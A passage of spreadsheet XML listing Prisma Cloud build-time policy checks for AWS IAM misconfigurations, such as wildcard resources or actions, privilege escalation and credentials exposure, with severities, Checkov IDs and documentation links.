      <c r="K1047" t="inlineStr">
        <is>
          <t>IAM policy document allows all resources with restricted actions</t>
        </is>
      </c>
      <c r="L1047" t="inlineStr"/>
      <c r="M1047" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1047" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1047" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1047" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1047" t="inlineStr"/>
      <c r="R1047" t="inlineStr"/>
      <c r="S1047" t="inlineStr"/>
      <c r="T1047" t="b">
        <v>0</v>
      </c>
      <c r="U1047" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1047" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam-policy,aws-iam-role-policy,aws-iam-user-policy,aws-iam-group-policy,aws-ssoadmin-permission-set-inline-policy</t>
        </is>
      </c>
      <c r="W1047" t="inlineStr">
        <is>
          <t>Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions</t>
        </is>
      </c>
      <c r="X1047" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-355</t>
        </is>
      </c>
      <c r="Y1047" t="inlineStr"/>
      <c r="Z1047" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_iam_policy","aws_iam_role_policy","aws_iam_user_policy","aws_iam_group_policy","aws_ssoadmin_permission_set_inline_policy"]}</t>
        </is>
      </c>
      <c r="AA1047" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1047" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1047" t="inlineStr">
        <is>
          <t>CKV_AWS_355</t>
        </is>
      </c>
      <c r="AD1047" t="b">
        <v>1</v>
      </c>
      <c r="AE1047" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1047" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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7" t="inlineStr">
        <is>
          <t>4e029c39-25f0-4ec7-979e-120f0270ea4a</t>
        </is>
      </c>
      <c r="AI1047" t="inlineStr"/>
      <c r="AJ1047" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1047" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1048">
      <c r="A1048" t="inlineStr"/>
      <c r="B1048" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1048" s="2" t="inlineStr"/>
      <c r="D1048" t="inlineStr"/>
      <c r="E1048" t="inlineStr"/>
      <c r="F1048" t="inlineStr"/>
      <c r="G1048" t="b">
        <v>1</v>
      </c>
      <c r="H10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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1048" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam</t>
        </is>
      </c>
      <c r="K1048" t="inlineStr">
        <is>
          <t>AWS IAM role has a GitHub Actions OIDC trust policy that does not specify a known organization</t>
        </is>
      </c>
      <c r="L1048" t="inlineStr"/>
      <c r="M1048" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1048" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1048" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1048" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1048" t="inlineStr"/>
      <c r="R1048" t="inlineStr"/>
      <c r="S1048" t="inlineStr"/>
      <c r="T1048" t="b">
        <v>0</v>
      </c>
      <c r="U1048" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1048" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam-policy-document</t>
        </is>
      </c>
      <c r="W1048" t="inlineStr">
        <is>
          <t>Ensure GitHub Actions OIDC trust policies only allow actions from a specific known organization</t>
        </is>
      </c>
      <c r="X1048" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/iam-358</t>
        </is>
      </c>
      <c r="Y1048" t="inlineStr"/>
      <c r="Z1048" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_iam_policy_document"]}</t>
        </is>
      </c>
      <c r="AA1048" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1048" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1048" t="inlineStr">
        <is>
          <t>CKV_AWS_358</t>
        </is>
      </c>
      <c r="AD1048" t="b">
        <v>1</v>
      </c>
      <c r="AE1048" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1048" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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8" t="inlineStr">
        <is>
          <t>dd4e61fb-13ae-4691-bc7c-3d98c3c0957a</t>
        </is>
      </c>
      <c r="AI1048" t="inlineStr"/>
      <c r="AJ1048" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1048" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1049">
      <c r="A1049" t="inlineStr"/>
      <c r="B1049" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1049" s="2" t="inlineStr"/>
      <c r="D1049" t="inlineStr"/>
      <c r="E1049" t="inlineStr"/>
      <c r="F1049" t="inlineStr"/>
      <c r="G1049" t="b">
        <v>1</v>
      </c>
      <c r="H10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49" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1049" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam</t>
        </is>
      </c>
      <c r="K1049" t="inlineStr">
        <is>
          <t>Write access allowed without constraint</t>
        </is>
      </c>
      <c r="L1049" t="inlineStr"/>
      <c r="M1049" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1049" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1049" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1049" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1049" t="inlineStr"/>
      <c r="R1049" t="inlineStr"/>
      <c r="S1049" t="inlineStr"/>
      <c r="T1049" t="b">
        <v>0</v>
      </c>
      <c r="U1049" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1049" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam-policy-document</t>
        </is>
      </c>
      <c r="W1049" t="inlineStr">
        <is>
          <t>Ensure IAM policies does not allow write access without constraints</t>
        </is>
      </c>
      <c r="X1049" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/ensure-iam-policies-do-not-allow-write-access-without-constraint</t>
        </is>
      </c>
      <c r="Y1049" t="inlineStr"/>
      <c r="Z1049" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_iam_policy_document"]}</t>
        </is>
      </c>
      <c r="AA1049" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1049" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1049" t="inlineStr">
        <is>
          <t>CKV_AWS_111</t>
        </is>
      </c>
      <c r="AD1049" t="b">
        <v>1</v>
      </c>
      <c r="AE1049" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1049" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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49" t="inlineStr">
        <is>
          <t>94ef4e9f-1263-4677-b3e3-b641ea9094e1</t>
        </is>
      </c>
      <c r="AI1049" t="inlineStr"/>
      <c r="AJ1049" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1049" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1050">
      <c r="A1050" t="inlineStr"/>
      <c r="B1050" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1050" s="2" t="inlineStr"/>
      <c r="D1050" t="inlineStr"/>
      <c r="E1050" t="inlineStr"/>
      <c r="F1050" t="inlineStr"/>
      <c r="G1050" t="b">
        <v>1</v>
      </c>
      <c r="H10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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1050" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam</t>
        </is>
      </c>
      <c r="K1050" t="inlineStr">
        <is>
          <t>AWS IAM policies that allow full administrative privileges are created</t>
        </is>
      </c>
      <c r="L1050" t="inlineStr"/>
      <c r="M1050" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1050" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1050" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1050" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1050" t="inlineStr"/>
      <c r="R1050" t="inlineStr"/>
      <c r="S1050" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="T1050" t="b">
        <v>0</v>
      </c>
      <c r="U1050" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1050" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam-policy-document</t>
        </is>
      </c>
      <c r="W1050" t="inlineStr">
        <is>
          <t>IAM policies are the means by which privileges are granted to users, groups, and roles. Standard security practice is to grant least privilege this is granting only the permissions required to perform a task. Providing full administrative may expose resources to potentially unwanted actions.</t>
        </is>
      </c>
      <c r="X1050" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/iam-23</t>
        </is>
      </c>
      <c r="Y1050" t="inlineStr"/>
      <c r="Z1050" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_iam_policy_document"]}</t>
        </is>
      </c>
      <c r="AA1050" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1050" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1050" t="inlineStr">
        <is>
          <t>CKV_AWS_1</t>
        </is>
      </c>
      <c r="AD1050" t="b">
        <v>1</v>
      </c>
      <c r="AE1050" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1050" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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0" t="inlineStr">
        <is>
          <t>2a28f982-ed75-48b0-9e50-f6fccd015335</t>
        </is>
      </c>
      <c r="AI1050" t="inlineStr"/>
      <c r="AJ1050" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1050" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1051">
      <c r="A1051" t="inlineStr"/>
      <c r="B1051" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1051" s="2" t="inlineStr"/>
      <c r="D1051" t="inlineStr"/>
      <c r="E1051" t="inlineStr"/>
      <c r="F1051" t="inlineStr"/>
      <c r="G1051" t="b">
        <v>1</v>
      </c>
      <c r="H10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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1051" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam</t>
        </is>
      </c>
      <c r="K1051" t="inlineStr">
        <is>
          <t>Resource exposure allows modification of policies and exposes resources</t>
        </is>
      </c>
      <c r="L1051" t="inlineStr"/>
      <c r="M1051" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1051" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1051" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1051" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1051" t="inlineStr"/>
      <c r="R1051" t="inlineStr"/>
      <c r="S1051" t="inlineStr"/>
      <c r="T1051" t="b">
        <v>0</v>
      </c>
      <c r="U1051" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1051" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam-policy-document</t>
        </is>
      </c>
      <c r="W1051" t="inlineStr">
        <is>
          <t>Ensure IAM policies does not allow permissions management / resource exposure without constraints</t>
        </is>
      </c>
      <c r="X1051" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/ensure-iam-policies-do-not-allow-permissions-management-resource-exposure-without-constraint</t>
        </is>
      </c>
      <c r="Y1051" t="inlineStr"/>
      <c r="Z1051" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_iam_policy_document"]}</t>
        </is>
      </c>
      <c r="AA1051" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1051" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1051" t="inlineStr">
        <is>
          <t>CKV_AWS_109</t>
        </is>
      </c>
      <c r="AD1051" t="b">
        <v>1</v>
      </c>
      <c r="AE1051" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1051" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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1" t="inlineStr">
        <is>
          <t>1164b45c-25f0-47ec-b7ff-d5442f8a68b0</t>
        </is>
      </c>
      <c r="AI1051" t="inlineStr"/>
      <c r="AJ1051" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1051" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1052">
      <c r="A1052" t="inlineStr"/>
      <c r="B1052" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1052" s="2" t="inlineStr"/>
      <c r="D1052" t="inlineStr"/>
      <c r="E1052" t="inlineStr"/>
      <c r="F1052" t="inlineStr"/>
      <c r="G1052" t="b">
        <v>1</v>
      </c>
      <c r="H10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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1052" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam</t>
        </is>
      </c>
      <c r="K1052" t="inlineStr">
        <is>
          <t>IAM policies allow privilege escalation</t>
        </is>
      </c>
      <c r="L1052" t="inlineStr"/>
      <c r="M1052" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1052" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1052" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1052" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1052" t="inlineStr"/>
      <c r="R1052" t="inlineStr"/>
      <c r="S1052" t="inlineStr"/>
      <c r="T1052" t="b">
        <v>0</v>
      </c>
      <c r="U1052" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1052" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam-policy-document</t>
        </is>
      </c>
      <c r="W1052" t="inlineStr">
        <is>
          <t>Ensure IAM policies does not allow privilege escalation</t>
        </is>
      </c>
      <c r="X1052" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/ensure-iam-policies-does-not-allow-privilege-escalation</t>
        </is>
      </c>
      <c r="Y1052" t="inlineStr"/>
      <c r="Z1052" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_iam_policy_document"]}</t>
        </is>
      </c>
      <c r="AA1052" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1052" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1052" t="inlineStr">
        <is>
          <t>CKV_AWS_110</t>
        </is>
      </c>
      <c r="AD1052" t="b">
        <v>1</v>
      </c>
      <c r="AE1052" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1052" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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2" t="inlineStr">
        <is>
          <t>8618c6a5-cd06-491b-9905-f88fc43c9926</t>
        </is>
      </c>
      <c r="AI1052" t="inlineStr"/>
      <c r="AJ1052" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1052" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1053">
      <c r="A1053" t="inlineStr"/>
      <c r="B1053" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1053" s="2" t="inlineStr"/>
      <c r="D1053" t="inlineStr"/>
      <c r="E1053" t="inlineStr"/>
      <c r="F1053" t="inlineStr"/>
      <c r="G1053" t="b">
        <v>1</v>
      </c>
      <c r="H10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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1053" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam</t>
        </is>
      </c>
      <c r="K1053" t="inlineStr">
        <is>
          <t>Data source IAM policy document allows all resources with restricted actions</t>
        </is>
      </c>
      <c r="L1053" t="inlineStr"/>
      <c r="M1053" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1053" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1053" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1053" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1053" t="inlineStr"/>
      <c r="R1053" t="inlineStr"/>
      <c r="S1053" t="inlineStr"/>
      <c r="T1053" t="b">
        <v>0</v>
      </c>
      <c r="U1053" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1053" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam-policy-document</t>
        </is>
      </c>
      <c r="W1053" t="inlineStr">
        <is>
          <t>Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions</t>
        </is>
      </c>
      <c r="X1053" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-356</t>
        </is>
      </c>
      <c r="Y1053" t="inlineStr"/>
      <c r="Z1053" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_iam_policy_document"]}</t>
        </is>
      </c>
      <c r="AA1053" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1053" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1053" t="inlineStr">
        <is>
          <t>CKV_AWS_356</t>
        </is>
      </c>
      <c r="AD1053" t="b">
        <v>1</v>
      </c>
      <c r="AE1053" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1053" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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3" t="inlineStr">
        <is>
          <t>e6549da7-fe94-44b8-9957-84770f3e790b</t>
        </is>
      </c>
      <c r="AI1053" t="inlineStr"/>
      <c r="AJ1053" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1053" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1054">
      <c r="A1054" t="inlineStr"/>
      <c r="B1054" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1054" s="2" t="inlineStr"/>
      <c r="D1054" t="inlineStr"/>
      <c r="E1054" t="inlineStr"/>
      <c r="F1054" t="inlineStr"/>
      <c r="G1054" t="b">
        <v>1</v>
      </c>
      <c r="H10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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1054" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam</t>
        </is>
      </c>
      <c r="K1054" t="inlineStr">
        <is>
          <t>Data exfiltration allowed without resource constraints</t>
        </is>
      </c>
      <c r="L1054" t="inlineStr"/>
      <c r="M1054" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1054" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1054" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1054" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1054" t="inlineStr"/>
      <c r="R1054" t="inlineStr"/>
      <c r="S1054" t="inlineStr"/>
      <c r="T1054" t="b">
        <v>0</v>
      </c>
      <c r="U1054" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1054" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam-policy-document</t>
        </is>
      </c>
      <c r="W1054" t="inlineStr">
        <is>
          <t>Ensure IAM policies does not allow data exfiltration</t>
        </is>
      </c>
      <c r="X1054" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/ensure-iam-policies-do-not-allow-data-exfiltration</t>
        </is>
      </c>
      <c r="Y1054" t="inlineStr"/>
      <c r="Z1054" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_iam_policy_document"]}</t>
        </is>
      </c>
      <c r="AA1054" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1054" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1054" t="inlineStr">
        <is>
          <t>CKV_AWS_108</t>
        </is>
      </c>
      <c r="AD1054" t="b">
        <v>1</v>
      </c>
      <c r="AE1054" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1054" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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4" t="inlineStr">
        <is>
          <t>6514f04a-c73e-414a-9880-27b2f4cc6ea5</t>
        </is>
      </c>
      <c r="AI1054" t="inlineStr"/>
      <c r="AJ1054" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1054" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1055">
      <c r="A1055" t="inlineStr"/>
      <c r="B1055" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1055" s="2" t="inlineStr"/>
      <c r="D1055" t="inlineStr"/>
      <c r="E1055" t="inlineStr"/>
      <c r="F1055" t="inlineStr"/>
      <c r="G1055" t="b">
        <v>1</v>
      </c>
      <c r="H10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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1055" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam</t>
        </is>
      </c>
      <c r="K1055" t="inlineStr">
        <is>
          <t>AWS IAM policy documents do not allow * (asterisk) as a statement's action</t>
        </is>
      </c>
      <c r="L1055" t="inlineStr"/>
      <c r="M1055" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1055" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1055" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1055" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1055" t="inlineStr"/>
      <c r="R1055" t="inlineStr"/>
      <c r="S1055" t="inlineStr"/>
      <c r="T1055" t="b">
        <v>0</v>
      </c>
      <c r="U1055" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1055" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam-policy-document</t>
        </is>
      </c>
      <c r="W1055" t="inlineStr">
        <is>
          <t>Ensure no IAM policies documents allow "*" as a statement's actions</t>
        </is>
      </c>
      <c r="X1055" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-iam-43</t>
        </is>
      </c>
      <c r="Y1055" t="inlineStr"/>
      <c r="Z1055" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_iam_policy_document"]}</t>
        </is>
      </c>
      <c r="AA1055" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1055" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1055" t="inlineStr">
        <is>
          <t>CKV_AWS_49</t>
        </is>
      </c>
      <c r="AD1055" t="b">
        <v>1</v>
      </c>
      <c r="AE1055" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1055" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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5" t="inlineStr">
        <is>
          <t>663ffb0a-4219-41ba-b72c-53aa9c694f5b</t>
        </is>
      </c>
      <c r="AI1055" t="inlineStr"/>
      <c r="AJ1055" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1055" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1056">
      <c r="A1056" t="inlineStr"/>
      <c r="B1056" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1056" s="2" t="inlineStr"/>
      <c r="D1056" t="inlineStr"/>
      <c r="E1056" t="inlineStr"/>
      <c r="F1056" t="inlineStr"/>
      <c r="G1056" t="b">
        <v>1</v>
      </c>
      <c r="H10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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1056" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam</t>
        </is>
      </c>
      <c r="K1056" t="inlineStr">
        <is>
          <t>Credentials exposure actions return credentials in an API response</t>
        </is>
      </c>
      <c r="L1056" t="inlineStr"/>
      <c r="M1056" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1056" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1056" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1056" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1056" t="inlineStr"/>
      <c r="R1056" t="inlineStr"/>
      <c r="S1056" t="inlineStr"/>
      <c r="T1056" t="b">
        <v>0</v>
      </c>
      <c r="U1056" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1056" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam-policy-document</t>
        </is>
      </c>
      <c r="W1056" t="inlineStr">
        <is>
          <t>Ensure IAM policies does not allow credentials exposure</t>
        </is>
      </c>
      <c r="X1056" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/ensure-iam-policies-do-not-allow-credentials-exposure</t>
        </is>
      </c>
      <c r="Y1056" t="inlineStr"/>
      <c r="Z1056" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_iam_policy_document"]}</t>
        </is>
      </c>
      <c r="AA1056" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1056" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1056" t="inlineStr">
        <is>
          <t>CKV_AWS_107</t>
        </is>
      </c>
      <c r="AD1056" t="b">
        <v>1</v>
      </c>
      <c r="AE1056" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1056" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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6" t="inlineStr">
        <is>
          <t>010fa450-e1b9-4890-a14e-b6062e709a9f</t>
        </is>
      </c>
      <c r="AI1056" t="inlineStr"/>
      <c r="AJ1056" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1056" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1057">
      <c r="A1057" t="inlineStr"/>
      <c r="B1057" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1057" s="2" t="inlineStr"/>
      <c r="D1057" t="inlineStr"/>
      <c r="E1057" t="inlineStr"/>
      <c r="F1057" t="inlineStr"/>
      <c r="G1057" t="b">
        <v>1</v>
      </c>
      <c r="H10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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1057" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam</t>
        </is>
      </c>
